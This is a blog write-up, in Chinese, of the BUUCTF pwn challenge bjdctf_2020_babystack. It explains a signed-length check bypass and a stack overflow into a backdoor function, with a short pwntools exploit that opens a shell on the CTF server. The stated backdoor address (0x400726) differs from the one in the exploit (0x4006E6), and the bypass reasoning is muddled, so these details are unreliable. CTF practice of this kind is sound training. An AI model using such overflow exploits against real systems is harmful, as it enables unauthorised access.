pwn刷题num29-----整数溢出

最新推荐文章于 2024-07-30 13:30:56 发布
最新推荐文章于 2024-07-30 13:30:56 发布
阅读量513 收藏 1
点赞数
分类专栏: CTF BUUCTF pwn 文章标签: 系统安全 网络安全 安全 python c语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tbsqigongzi/article/details/124457635
版权
pwn 同时被 3 个专栏收录
67 篇文章 5 订阅
订阅专栏
CTF
61 篇文章 1 订阅
订阅专栏
BUUCTF
36 篇文章 0 订阅
订阅专栏

BUUCTF-PWN-bjdctf_2020_babystack在这里插入图片描述

首先查保护–>看链接类型–>赋予程序可执行权限–>试运行在这里插入图片描述

64位程序,小端序
开启部分RELRO-----got表仍可写
未开启canary保护-----存在栈溢出
开启NX保护-----堆栈不可执行
未开启PIE-----程序地址为真实地址
动态链接

在这里插入图片描述
程序先让我们输入name的长度,之后又让我们输入一个name
ida一下看一下主函数
在这里插入图片描述
观察发现nbytes存放着我们输入的name的大小,之后又用read函数输入nbytes字节大小的字符给buf,看一下栈区
在这里插入图片描述
buf距离返回地址(r所在位置)0x18字节(0x10+0x8),我们需要让nbytes至少要大于0x18
再回到主函数,我们想if语句里的
在这里插入图片描述
这个if语句先把nbytes转换为有符号整形,再与10比较,如果我们把nbytes输入为10000001(无符号整形为0x81,有符号整形为1,1<10)就可以绕过if语句,执行read函数,覆盖返回地址,查看一下有没有后门函数
在这里插入图片描述
在这里插入图片描述
后门函数地址为0x400726
exp

from pwn import *
context(log_level = 'debug', os = 'linux', arch = 'amd64', endian = 'little')
sh = remote('node4.buuoj.cn',28656)
backdoor = 0x4006E6
sh.recvuntil('name:')
sh.sendline(b'129')
payload = flat(['a' * 0x18,backdoor])
sh.recvuntil("name?")
sh.sendline(payload)
sh.interactive()

运行获得shell
在这里插入图片描述
在这里插入图片描述

tbsqigongzi
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python 曲线拟合参数能否为数组_Python曲线将多个参数拟合到多个数据集
weixin_35450735的博客
01-28 713
我尝试使用scipy的曲线拟合函数来求解模型参数。我使用Python curve_fit with multiple independent variables作为起点,并且能够满足我的需求,但是现在我想使用两个输入数据集来派生两个数据集共享的模型参数(长期而言,我希望使用两个以上的数据集,但作为起点,我使用两个以上的数据集)。在我想最简单的方法可能是使用曲线拟合并将数据作为矩阵输入。作为一个非常...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
scipy.curve_fit报错:Improper input: N=11 must not exceed M=8
qq_43392533的博客
05-26 5515
N是需要拟合的参数个数,M是样本个数,应该样本个数>参数个数。
python中curve fit_在python中拟合多变量curve_fit
weixin_39876739的博客
12-04 2036
我试图将一个简单的函数适用于python中两个独立数据的数组.我明白,我需要将自变量的数据绑定到一个数组中,但是当我尝试做合适时,我传递变量的方式似乎还有一些错误. (有一些以前的帖子与这个相关,但他们没有太多的帮助.)import numpy as npimport matplotlib.pyplot as pltfrom scipy.optimize import curve_fitdef f...
pwn刷题num39----整数溢出
tbsqigongzi的博客
05-02 440
BUUCTF-PWN-bjdctf_2020_babyrop 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida看一下主函数 char buf; // [rsp+0h] [rbp-10h] ..... ...... ...... ........ if ( (signed int
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Keil v5 Error: Encountered an improper argument 个人实测解决办法
05-20
Keil v5 Error: Encountered an improper argument 个人实测解决办法 实测运行正常咯,再也不出现仿真关不了debug情况了
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
pwn-x64-printf泄露题目
08-04
x64 printf回显漏洞
POJ3661running
WhaleFall
03-24 298
Running Time Limit: 1000MS   Memory Limit: 65536K Total Submissions: 6818   Accepted: 2532 Description The cows are trying to become better athletes, so Bessie is running
S函数书写报错:Output flag=3 must be real vector of length 1
weixin_58082319的博客
06-07 947
对于离散系统报错原因我找到的主要有两个
cminpack软件包中lmdif求最小二乘解的函数使用
Thinker_Ping
02-23 2390
NAME lmdif_, lmdif1_ - minimize the sum of squares of m nonlinear functions   SYNOPSIS include minpack.h> void lmdif1_ ( void (*fcn)(int *m, int *n, double *x, double *fvec, int *iflag),
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1075
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
确保汽车电子电气系统安全:ISO 26262合规性实施指南
最新发布
yayuanjingkeji的博客
07-30 371
阅读和理解ISO 26262的各个部分,包括通则、管理功能安全、概念阶段、系统级功能安全、硬件级功能安全、软件级功能安全和生产、运营、维护、报废阶段的功能安全要求。- 建立一个有效的FSM,包括安全管理体系、功能安全计划、功能安全评估、危害分析和风险评估(HARA)、安全概念(FSC)和技术安全需求(TSR)。- 确定适用的ASIL(汽车安全完整性等级)级别,ASIL分为A、B、C、D四个级别,等级越高,安全要求越严格。- 在运营和维护阶段,实施有效的监控和维护程序,确保系统的持续安全运行。
攻防世界pwn-forgot
08-10
- *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值